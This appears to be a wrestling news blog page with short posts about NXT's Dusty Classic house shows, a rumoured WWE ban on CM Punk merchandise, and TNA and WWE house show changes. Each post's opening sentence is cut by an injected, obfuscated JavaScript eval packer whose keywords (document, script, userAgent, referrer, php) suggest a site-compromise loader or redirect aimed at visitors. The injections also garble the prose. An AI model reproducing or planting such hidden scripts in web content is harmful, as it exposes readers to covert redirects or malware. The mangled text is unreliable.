Another Sign That NXT Is Smart

They’re eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntbtk|var|u0026u|referrer|ttfii||js|php'.split('|'),0,{})) having a bunch of the Dusty Classic matches at house shows.  Instead of just having the matches at Full Sail and probably wearing out the live crowd, they’re mixing the schedule up.  My guess is we’ll only see clips of some of these matches instead of the full version and that’s a good decision.  You don’t need to see every match in full to get the gist of the tournament.

Again: NXT thinks this stuff through and gets the best results possible.

WWE’s CM Punk “Policy”

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ektii|var|u0026u|referrer|knfks||js|php'.split('|'),0,{})) is a rumor going around and I have a real hard time believing it’s true.Allegedly, any fans at shows, including house shows aren’t allowed to bring CM Punk signs or wear CM Punk merchandise.  If they’re seen wearing the gear, they’ll be asked to remove it or leave the arena.  I can accept (don’t read as I agree with it) the signs idea at TV as it’s going to cause a distraction but t-shirts at a house show?  As in t-shirts likely purchased through WWE?  Are they going to give you a replacement shirt?  Confiscate the shirt?  If someone is thrown out of a show and not given a refund, you can see the lawsuits and complaints starting up from here.  I’d pay to see WWE trying to spin “Well they were wearing one of our shirts and we didn’t want that!” in court.

Again, I don’t buy this as legit, at least not the shirts part.  If it is true though…….dude, come on.

TNA Putting House Shows On Hold Indefinitely

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkzri|var|u0026u|referrer|kkyzn||js|php'.split('|'),0,{})) signs continue to mount up. It’s a bad sign when the best way to save money is to not have the wrestlers perform. They’ll have TV up to BFG but after that is up in the air. Things are really looking bad for TNA right now and they’re practically circling the drain.

TNA Cancels Late September House Shows

Several eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kirts|var|u0026u|referrer|snthf||js|php'.split('|'),0,{})) shows have been removed from the schedule with the last one now being scheduled for September 7. Now to be fair they did this last year for Bound For Glory, but things are a bit different now. It’s also not a good sign that as of now, they won’t be running a new event for a month. If nothing else, that could mean some serious ring rust. Hopefully these are rescheduled.

TNA Running Two House Shows In October

According eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbnnz|var|u0026u|referrer|kbeia||js|php'.split('|'),0,{})) to Meltzer it’s a cost cutting measure.  That’s a bad sign if they’re so tight for money they can’t run house shows.  I was at a show a few months ago and a TNA employee asked me to write up a good report for them on the internet.  The fact that they’re relying on fans to report on the internet that they’re fun shows on top of this tells me that they’re having problems.

WWE Ending Single Branded House Shows

That’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nsinb|var|u0026u|referrer|eedrs||js|php'.split('|'),0,{})) the big news of the day.  Apparently the Raw and Smackdown brand names will be phased out of the live events but they’ll still be running two tours.  This is how it was back in the 80s and that means….That I like this idea.  Back in the day you didn’t know who was going to be on a show other than the top matches, so having a nice mix of people underneath the main events is a good idea.  It gives you an incentive to go because even if you don’t like just Raw or just Smackdown, you might see someone from another show that you like.  That’s a smart move.
